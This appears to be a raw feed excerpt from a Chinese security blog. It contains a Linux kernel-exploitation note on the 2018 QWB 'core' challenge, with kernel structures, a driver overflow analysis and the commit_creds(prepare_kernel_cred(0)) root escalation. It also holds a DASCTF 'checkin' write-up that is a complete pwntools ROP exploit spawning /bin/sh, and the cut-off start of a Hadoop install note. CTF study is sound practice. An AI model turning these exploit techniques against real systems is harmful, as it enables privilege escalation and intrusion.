class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">cred</span> &#123;</span></span><br><span class="line">    <span class="keyword">atomic_t</span>    usage;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">ifdef</span> CONFIG_DEBUG_CREDENTIALS</span></span><br><span class="line">    <span class="keyword">atomic_t</span>    subscribers;    <span class="comment">/* number of processes subscribed */</span></span><br><span class="line">    <span class="keyword">void</span>        *put_addr;</span><br><span class="line">    <span class="keyword">unsigned</span>    magic;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> CRED_MAGIC  0x43736564</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> CRED_MAGIC_DEAD 0x44656144</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line">    <span class="keyword">kuid_t</span>      uid;        <span class="comment">/* real UID of the task */</span></span><br><span class="line">    <span class="keyword">kgid_t</span>      gid;        <span class="comment">/* real GID of the task */</span></span><br><span class="line">    <span class="keyword">kuid_t</span>      suid;       <span class="comment">/* saved UID of the task */</span></span><br><span class="line">    <span class="keyword">kgid_t</span>      sgid;       <span class="comment">/* saved GID of the task */</span></span><br><span class="line">    <span class="keyword">kuid_t</span>      euid;       <span class="comment">/* effective UID of the task */</span></span><br><span class="line">    <span class="keyword">kgid_t</span>      egid;       <span class="comment">/* effective GID of the task */</span></span><br><span class="line">    <span class="keyword">kuid_t</span>      fsuid;      <span class="comment">/* UID for VFS ops */</span></span><br><span class="line">    <span class="keyword">kgid_t</span>      fsgid;      <span class="comment">/* GID for VFS ops */</span></span><br><span class="line">    <span class="keyword">unsigned</span>    securebits; <span class="comment">/* SUID-less security management */</span></span><br><span class="line">    <span class="keyword">kernel_cap_t</span>    cap_inheritable; <span class="comment">/* caps our children can inherit */</span></span><br><span class="line">    <span class="keyword">kernel_cap_t</span>    cap_permitted;  <span class="comment">/* caps we&#x27;re permitted */</span></span><br><span class="line">    <span class="keyword">kernel_cap_t</span>    cap_effective;  <span class="comment">/* caps we can actually use */</span></span><br><span class="line">    <span class="keyword">kernel_cap_t</span>    cap_bset;   <span class="comment">/* capability bounding set */</span></span><br><span class="line">    <span class="keyword">kernel_cap_t</span>    cap_ambient;    <span class="comment">/* Ambient capability set */</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">ifdef</span> CONFIG_KEYS</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">char</span>   jit_keyring;    <span class="comment">/* default keyring to attach requested</span></span><br><span class="line"><span class="comment">                     * keys to */</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">key</span> __<span class="title">rcu</span> *<span class="title">session_keyring</span>;</span> <span class="comment">/* keyring inherited over fork */</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">key</span>  *<span class="title">process_keyring</span>;</span> <span class="comment">/* keyring private to this process */</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">key</span>  *<span class="title">thread_keyring</span>;</span> <span class="comment">/* keyring private to this thread */</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">key</span>  *<span class="title">request_key_auth</span>;</span> <span class="comment">/* assumed request_key authority */</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">ifdef</span> CONFIG_SECURITY</span></span><br><span class="line">    <span class="keyword">void</span>        *security;  <span class="comment">/* subjective LSM security */</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">user_struct</span> *<span class="title">user</span>;</span>   <span class="comment">/* real user ID subscription */</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">user_namespace</span> *<span class="title">user_ns</span>;</span> <span class="comment">/* user_ns the caps and keyrings are relative to. */</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">group_info</span> *<span class="title">group_info</span>;</span>  <span class="comment">/* supplementary groups for euid/fsgid */</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">rcu_head</span> <span class="title">rcu</span>;</span>        <span class="comment">/* RCU deletion hook */</span></span><br><span class="line">&#125; __randomize_layout;</span><br></pre></td></tr></table></figure><h2 id="状态切换"><a href="#状态切换" class="headerlink" title="状态切换"></a>状态切换</h2><h3 id="user2kernel-user-space-to-kernel-space"><a href="#user2kernel-user-space-to-kernel-space" class="headerlink" title="user2kernel(user space to kernel space)"></a>user2kernel(user space to kernel space)</h3><p>当发生 <code>系统调用</code>，<code>产生异常</code>，<code>外设产生中断</code>等事件时，用户态会切换到内核态</p><ol><li>通过 <code>swapgs</code> 切换 GS 段寄存器，将 GS 寄存器值和一个特定位置的值进行交换，目的是保存 GS 值，同时将该位置的值作为内核执行时的 GS 值使用。</li><li>将当前栈顶（用户空间栈顶）记录在 CPU 独占变量区域里，将 CPU 独占区域里记录的内核栈顶放入 rsp/esp。</li><li>通过 push 保存各寄存器值。</li></ol><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"> ENTRY(entry_SYSCALL_64)</span><br><span class="line"> &#x2F;* SWAPGS_UNSAFE_STACK是一个宏，x86直接定义为swapgs指令 *&#x2F;</span><br><span class="line"> SWAPGS_UNSAFE_STACK</span><br><span class="line"></span><br><span class="line"> &#x2F;* 保存栈值，并设置内核栈 *&#x2F;</span><br><span class="line"> movq %rsp, PER_CPU_VAR(rsp_scratch)</span><br><span class="line"> movq PER_CPU_VAR(cpu_current_top_of_stack), %rsp</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&#x2F;* 通过push保存寄存器值，形成一个pt_regs结构 *&#x2F;</span><br><span class="line">&#x2F;* Construct struct pt_regs on stack *&#x2F;</span><br><span class="line">pushq  $__USER_DS      &#x2F;* pt_regs-&gt;ss *&#x2F;</span><br><span class="line">pushq  PER_CPU_VAR(rsp_scratch)  &#x2F;* pt_regs-&gt;sp *&#x2F;</span><br><span class="line">pushq  %r11             &#x2F;* pt_regs-&gt;flags *&#x2F;</span><br><span class="line">pushq  $__USER_CS      &#x2F;* pt_regs-&gt;cs *&#x2F;</span><br><span class="line">pushq  %rcx             &#x2F;* pt_regs-&gt;ip *&#x2F;</span><br><span class="line">pushq  %rax             &#x2F;* pt_regs-&gt;orig_ax *&#x2F;</span><br><span class="line">pushq  %rdi             &#x2F;* pt_regs-&gt;di *&#x2F;</span><br><span class="line">pushq  %rsi             &#x2F;* pt_regs-&gt;si *&#x2F;</span><br><span class="line">pushq  %rdx             &#x2F;* pt_regs-&gt;dx *&#x2F;</span><br><span class="line">pushq  %rcx tuichu    &#x2F;* pt_regs-&gt;cx *&#x2F;</span><br><span class="line">pushq  $-ENOSYS        &#x2F;* pt_regs-&gt;ax *&#x2F;</span><br><span class="line">pushq  %r8              &#x2F;* pt_regs-&gt;r8 *&#x2F;</span><br><span class="line">pushq  %r9              &#x2F;* pt_regs-&gt;r9 *&#x2F;</span><br><span class="line">pushq  %r10             &#x2F;* pt_regs-&gt;r10 *&#x2F;</span><br><span class="line">pushq  %r11             &#x2F;* pt_regs-&gt;r11 *&#x2F;</span><br><span class="line">sub $(6*8), %rsp      &#x2F;* pt_regs-&gt;bp, bx, r12-15 not saved *&#x2F;</span><br></pre></td></tr></table></figure><h3 id="kernel2user-kernel-space-to-user-space"><a href="#kernel2user-kernel-space-to-user-space" class="headerlink" title="kernel2user(kernel space to user space)"></a>kernel2user(kernel space to user space)</h3><ol><li>通过 <code>swapgs</code> 恢复 GS 值</li><li>通过 <code>sysretq</code> 或者 <code>iretq</code> 恢复到用户控件继续执行。如果使用 <code>iretq</code> 还需要给出用户空间的一些信息（CS, eflags/rflags, esp/rsp 等）</li></ol><h2 id="文件结构"><a href="#文件结构" class="headerlink" title="文件结构"></a>文件结构</h2><h3 id="boot-sh"><a href="#boot-sh" class="headerlink" title="boot.sh"></a>boot.sh</h3><p>一个用于启动 kernel 的 shell 的脚本，多用 qemu，保护措施与 qemu 不同的启动参数有关</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">qemu-system-x86_64 \<span class="comment">#qemu启动</span></span><br><span class="line">-m 64M \<span class="comment">#设置虚拟RAM大小（默认128M）</span></span><br><span class="line">-kernel ./bzImage \<span class="comment">#指定内核镜像</span></span><br><span class="line">-initrd  ./core.cpio \<span class="comment">#内核启动的文件系统</span></span><br><span class="line">-append <span class="string">&quot;root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr&quot;</span> \<span class="comment">#启动界面为终端、内存文件系统RamDisk，这里还开启了kaslr</span></span><br><span class="line">-s  \</span><br><span class="line">-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \<span class="comment">#</span></span><br><span class="line">-nographic  \<span class="comment">#非图形界面</span></span><br></pre></td></tr></table></figure><p>相关选项</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">-append 附加选项，指定no kaslr可以关闭随机偏移</span><br><span class="line">--nographic和console=ttyS0一起使用，启动的界面就变成当前终端</span><br><span class="line"></span><br><span class="line">-s 相当于-gdb tcp::1234的简写，可以直接通过主机的gdb远程连接</span><br><span class="line"></span><br><span class="line">-monitor配置用户模式的网络<span class="comment">#将监视器重定向到主机设备/dev/null</span></span><br><span class="line"></span><br><span class="line">-smp 用于声明所有可能用到的cpus, i.e. sockets cores threads = maxcpus.</span><br><span class="line"></span><br><span class="line">-cpu 设置CPU的安全选项</span><br><span class="line"><span class="comment">#-cpu kvm64,+smep,+smap  例如这里是开启了 smap 和 smep</span></span><br><span class="line"></span><br></pre></td></tr></table></figure><h3 id="bzImage"><a href="#bzImage" class="headerlink" title="bzImage"></a>bzImage</h3><p>Linux内核镜像文件</p><h3 id="vmlinux"><a href="#vmlinux" class="headerlink" title="vmlinux"></a>vmlinux</h3><p>vmlinux是未压缩的内核，vmlinux 是ELF文件，即编译出来的最原始的文件。用于kernel-debug，产生system.map符号表，不能用于直接加载，不可以作为启动内核。只是启动过程中的中间媒体</p><h3 id="cpio"><a href="#cpio" class="headerlink" title="*.cpio"></a>*.cpio</h3><p>打包后的文件系统</p><h3 id="ko"><a href="#ko" class="headerlink" title="*.ko"></a>*.ko</h3><p>有漏洞的驱动文件</p><h3 id="init"><a href="#init" class="headerlink" title="init"></a>init</h3><p>一个内核启动的初始化文件</p><h1 id="启动之前"><a href="#启动之前" class="headerlink" title="启动之前"></a>启动之前</h1><h2 id="解包"><a href="#解包" class="headerlink" title="解包"></a>解包</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">mkdir core</span><br><span class="line">mv core.cpio ./core/core.cpio</span><br><span class="line"><span class="built_in">cd</span> core</span><br><span class="line">cpio -idmv &lt; core.cpio   <span class="comment">#解包</span></span><br></pre></td></tr></table></figure><p>或者.gz？</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mv core.cpio ./core/core.cpio.gz</span><br><span class="line"><span class="built_in">cd</span> core</span><br><span class="line">gunzip core.cpio.gz <span class="comment"># 这一步不是每个题都有的</span></span><br></pre></td></tr></table></figure><h2 id="打包"><a href="#打包" class="headerlink" title="打包"></a>打包</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ rm -rf core.cpio</span><br><span class="line">$ v init   <span class="comment">#修改初始文件</span></span><br><span class="line">$ find . | cpio -o --format=newc &gt; ../rootfs.img<span class="comment">#打包</span></span><br></pre></td></tr></table></figure><h1 id="2018强网杯-core"><a href="#2018强网杯-core" class="headerlink" title="2018强网杯 core"></a>2018强网杯 core</h1><h2 id="checksec"><a href="#checksec" class="headerlink" title="checksec"></a>checksec</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Arch:     amd64-64-little</span><br><span class="line">RELRO:    No RELRO</span><br><span class="line">Stack:    Canary found</span><br><span class="line">NX:       NX enabled</span><br><span class="line">PIE:      No PIE (0x0)</span><br></pre></td></tr></table></figure><p>开了Canary</p><h2 id="题目分析"><a href="#题目分析" class="headerlink" title="题目分析"></a>题目分析</h2><h3 id="start-sh"><a href="#start-sh" class="headerlink" title="start.sh"></a>start.sh</h3><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">qemu-system-x86_64 \</span><br><span class="line">-m 64M \</span><br><span class="line">-kernel ./bzImage \</span><br><span class="line">-initrd  ./core.cpio \</span><br><span class="line">-append <span class="string">&quot;root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr&quot;</span> \</span><br><span class="line">-s  \</span><br><span class="line">-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \</span><br><span class="line">-nographic  \</span><br></pre></td></tr></table></figure><p>开了kaslr，没有开启SMAP和SMEP</p><h3 id="init-1"><a href="#init-1" class="headerlink" title="init"></a>init</h3><p>解包之后的文件，一个内核启动的初始化文件</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/sh</span></span><br><span class="line">mount -t proc proc /proc</span><br><span class="line">mount -t sysfs sysfs /sys</span><br><span class="line">mount -t devtmpfs none /dev</span><br><span class="line">/sbin/mdev -s</span><br><span class="line">mkdir -p /dev/pts</span><br><span class="line">mount -vt devpts -o gid=4,mode=620 none /dev/pts</span><br><span class="line">chmod 666 /dev/ptmx</span><br><span class="line">cat /proc/kallsyms &gt; /tmp/kallsyms</span><br><span class="line"><span class="built_in">echo</span> 1 &gt; /proc/sys/kernel/kptr_restrict</span><br><span class="line"><span class="built_in">echo</span> 1 &gt; /proc/sys/kernel/dmesg_restrict</span><br><span class="line">ifconfig eth0 up</span><br><span class="line">udhcpc -i eth0</span><br><span class="line">ifconfig eth0 10.0.2.15 netmask 255.255.255.0</span><br><span class="line">route add default gw 10.0.2.2 </span><br><span class="line">insmod /core.ko</span><br><span class="line"></span><br><span class="line">poweroff -d 120 -f &amp;</span><br><span class="line">setsid /bin/cttyhack setuidgid 1000 /bin/sh</span><br><span class="line"><span class="built_in">echo</span> <span class="string">&#x27;sh end!\n&#x27;</span></span><br><span class="line">umount /proc</span><br><span class="line">umount /sys</span><br><span class="line"></span><br><span class="line">poweroff -d 0  -f</span><br></pre></td></tr></table></figure><h3 id="有vmlinux"><a href="#有vmlinux" class="headerlink" title="有vmlinux"></a>有vmlinux</h3><h2 id="IDA分析core-ko"><a href="#IDA分析core-ko" class="headerlink" title="IDA分析core.ko"></a>IDA分析core.ko</h2><h3 id="init-module"><a href="#init-module" class="headerlink" title="init_module"></a>init_module</h3><p>创建一个proc虚拟文件，应用层通过读写该文件，即可实现与内核的交互。</p><p><img src="/article/Linux%20Kernel%200x1/image-20220404132302377.png" alt="image-20220404132302377"></p><h3 id="core-ioctl"><a href="#core-ioctl" class="headerlink" title="core_ioctl"></a>core_ioctl</h3><p>这个是ioctl函数驱动时进入的函数，可以类比一些mian函数</p><p><img src="/article/Linux%20Kernel%200x1/image-20220404132237103.png" alt="image-20220404132237103"></p><h3 id="core-read"><a href="#core-read" class="headerlink" title="core_read"></a>core_read</h3><p><code>copy_to_user()</code>拷贝64字节到用户空间a1，全局变量off可控，因此可以控制off的值来泄露canary和基地址</p><p>canary值在rsp+40h处</p><p><img src="/article/Linux%20Kernel%200x1/image-20220404132341618.png" alt="image-20220404132341618"></p><h3 id="core-write"><a href="#core-write" class="headerlink" title="core_write"></a>core_write</h3><p><code>copy_from_user()</code>从用户态向内核态写入数据，保存到全局变量name中</p><p><img src="/article/Linux%20Kernel%200x1/image-20220404132400697.png" alt="image-20220404132400697"></p><h3 id="core-copy-func"><a href="#core-copy-func" class="headerlink" title="core_copy_func"></a>core_copy_func</h3><p>从全局变量name中copy数据到v2。a1是可控的，绕过a1 &gt; 63 执行<code>qmemcpy()</code>。比较的时候a1是_int64，在执行qmenmcpy的时候是unsigned _int16，当a1是负数的时候，转成无符号数就会非常大，造成溢出。</p><p><img src="/article/Linux%20Kernel%200x1/image-20220404132526370.png" alt="image-20220404132526370"></p><h2 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h2><ol><li>设置off</li><li>调用core_copy_func，泄露canary</li><li>调用write将payload写入全局变量name</li><li>调用core_copy_func栈溢出</li></ol><h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>劫持了流，在用户态的pwn只要弹个shell即可完成利用，但是内核态需要更多操作保证系统的稳定性。</p><p>我们劫持的控制流是进入内核态的，拥有特权，因此可以完成提权。</p><p><code>commit_creds(prepare_kernel_cred(0));</code></p><p>执行commit_creds(prepare_kernel_cred(0)); 创建新的凭证结构体使得uid / gid为0</p><p>然后执行<code>&quot;/bin/sh&quot;</code>就可以拿到root权限的shell</p><p>参考：</p><p><a href="https://bbs.pediy.com/thread-262425.htm#msg_header_h2_0">https://bbs.pediy.com/thread-262425.htm#msg_header_h2_0</a></p><p><a href="https://ctf-wiki.org/pwn/linux/kernel-mode/basic-knowledge/#struct-cred">https://ctf-wiki.org/pwn/linux/kernel-mode/basic-knowledge/#struct-cred</a></p><p><a href="https://bbs.pediy.com/thread-259386.htm">https://bbs.pediy.com/thread-259386.htm</a></p><p><a href="http://eeeeeeeeeeeeeeeea.cn/2021/11/13/kernel-pwn-%E4%BA%8C/">http://eeeeeeeeeeeeeeeea.cn/2021/11/13/kernel-pwn-%E4%BA%8C/</a></p><p><a href="https://blog.csdn.net/weixin_35182419/article/details/111951986">https://blog.csdn.net/weixin_35182419/article/details/111951986</a></p>]]></content>
    
    
    <summary type="html">Linux Kernel 0x1</summary>
    
    
    
    <category term="笔记" scheme="https://trick.ink/categories/%E7%AC%94%E8%AE%B0/"/>
    
    
  </entry>
  
  <entry>
    <title>DASCTF2022.3</title>
    <link href="https://trick.ink/article/DASCTF2022.3/"/>
    <id>https://trick.ink/article/DASCTF2022.3/</id>
    <published>2022-04-03T13:10:22.000Z</published>
    <updated>2022-04-03T13:11:50.083Z</updated>
    
    <content type="html"><![CDATA[<h1 id="DASCTF2022-3"><a href="#DASCTF2022-3" class="headerlink" title="DASCTF2022.3"></a>DASCTF2022.3</h1><!-- 文章页 配置 --><h1 id="checkin"><a href="#checkin" class="headerlink" title="checkin"></a>checkin</h1><h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"><span class="keyword">import</span> ctypes</span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"><span class="comment"># context.arch = &#x27;i386&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">&#x27;checkin&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line">    p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">25323</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;127.0.0.1&#x27;</span>,<span class="number">12345</span>)</span><br><span class="line">    <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">&#x27;./libc.so.6&#x27;</span>)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">fake_stack = <span class="number">0x404500</span></span><br><span class="line">main_read = <span class="number">0x0000000004011BF</span></span><br><span class="line">leave = <span class="number">0x00000000004011E2</span></span><br><span class="line">read_got = <span class="number">0x404018</span></span><br><span class="line">csu_begin = <span class="number">0x040124A</span></span><br><span class="line">main = <span class="number">0x000000000401156</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">csu</span>(<span class="params">function,rdi,rsi,rdx</span>):</span></span><br><span class="line">    payload = p64(<span class="number">0</span>) + p64(<span class="number">1</span>) + p64(rdi) + p64(rsi) + p64(rdx) + p64(function)</span><br><span class="line">    payload += p64(<span class="number">0x401230</span>) + p64(<span class="number">0</span>)*<span class="number">7</span></span><br><span class="line">    <span class="keyword">return</span> payload</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(p,&#x27;b *0x0000000004011CB&#x27;)</span></span><br><span class="line"><span class="comment"># gdb.attach(p,&#x27;b *0x401239\nc\n&#x27;)</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1</span></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0xa0</span> + p64(fake_stack+<span class="number">0xa0</span>) + p64(main_read)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">payload = p64(csu_begin)</span><br><span class="line">payload += csu(read_got,<span class="number">0</span>,read_got,<span class="number">2</span>) + p64(main)</span><br><span class="line">payload = payload.ljust(<span class="number">0xa0</span>,<span class="string">&#x27;\x00&#x27;</span>)</span><br><span class="line">payload += p64(fake_stack-<span class="number">8</span>) + p64(leave)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">sleep(<span class="number">0.1</span>)</span><br><span class="line">p.send(<span class="string">&#x27;\x00\x40&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># 2</span></span><br><span class="line">bin_sh = <span class="number">0x404800</span></span><br><span class="line">fake_stack += <span class="number">0x200</span></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0xa0</span> + p64(fake_stack+<span class="number">0xa0</span>) + p64(main_read)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">payload = p64(csu_begin)</span><br><span class="line">payload += p64(<span class="number">0</span>) + p64(<span class="number">1</span>) + p64(<span class="number">0</span>) + p64(fake_stack+<span class="number">0x100</span>) + p64(<span class="number">0x3B</span>) + p64(read_got) + p64(<span class="number">0x0401230</span>)</span><br><span class="line">payload += p64(<span class="number">0</span>)*<span class="number">2</span> + p64(<span class="number">1</span>) + p64(bin_sh) + p64(<span class="number">0</span>)*<span class="number">2</span> + p64(read_got) + p64(<span class="number">0x0401230</span>)</span><br><span class="line">payload = payload.ljust(<span class="number">0xa0</span>,<span class="string">&#x27;\x00&#x27;</span>)</span><br><span class="line">payload += p64(fake_stack-<span class="number">8</span>) + p64(leave)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">sleep(<span class="number">0.1</span>)</span><br><span class="line">payload = <span class="string">&#x27;/bin/sh\x00&#x27;</span>.ljust(<span class="number">0x3b</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>]]></content>
    
    
    <summary type="html">DASCTF2022.3</summary>
    
    
    
    <category term="WriteUp/笔记" scheme="https://trick.ink/categories/WriteUp-%E7%AC%94%E8%AE%B0/"/>
    
    
  </entry>
  
  <entry>
    <title>学校课程之云计算</title>
    <link href="https://trick.ink/article/%E5%AD%A6%E6%A0%A1%E8%AF%BE%E7%A8%8B%E4%B9%8B%E4%BA%91%E8%AE%A1%E7%AE%97/"/>
    <id>https://trick.ink/article/%E5%AD%A6%E6%A0%A1%E8%AF%BE%E7%A8%8B%E4%B9%8B%E4%BA%91%E8%AE%A1%E7%AE%97/</id>
    <published>2022-03-21T07:05:49.000Z</published>
    <updated>2023-02-09T18:02:58.927Z</updated>
    
    <content type="html"><![CDATA[<h1 id="云计算"><a href="#云计算" class="headerlink" title="云计算"></a>云计算</h1><h1 id="Ubuntu20下安装hadoop"><a href="#Ubuntu20下安装hadoop" class="headerlink" title="Ubuntu20下安装hadoop"></a>Ubuntu20下安装hadoop</h1><h2 id="安装jdk"><a href="#安装jdk" class="headerlink" title="安装jdk"></a>安装jdk</h2><h3 id="1-官网下载"><a href="#1-官网下载" class="headerlink" title="1.官网下载"></a>1.官网下载</h3><p><a href="https://www.oracle.com/java/technologies/downloads/#java8">官网链接</a></p><h3 id="2-解压"><a href="#2-解压" class="headerlink" title="2.解压"></a>2.解压</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tar -zxvf jdk-8u321-linux-x64.tar.gz</span><br></pre></td></tr></table></figure><h3 id="3-修改配置"><a href="#3-修改配置" class="headerlink" title="3.修改配置"></a>3.修改配置</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo vim ~/.bashrc</span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">export JAVA_HOME&#x3D;&#x2F;home&#x2F;trick&#x2F;jdk1.8.0_321</span><br><span 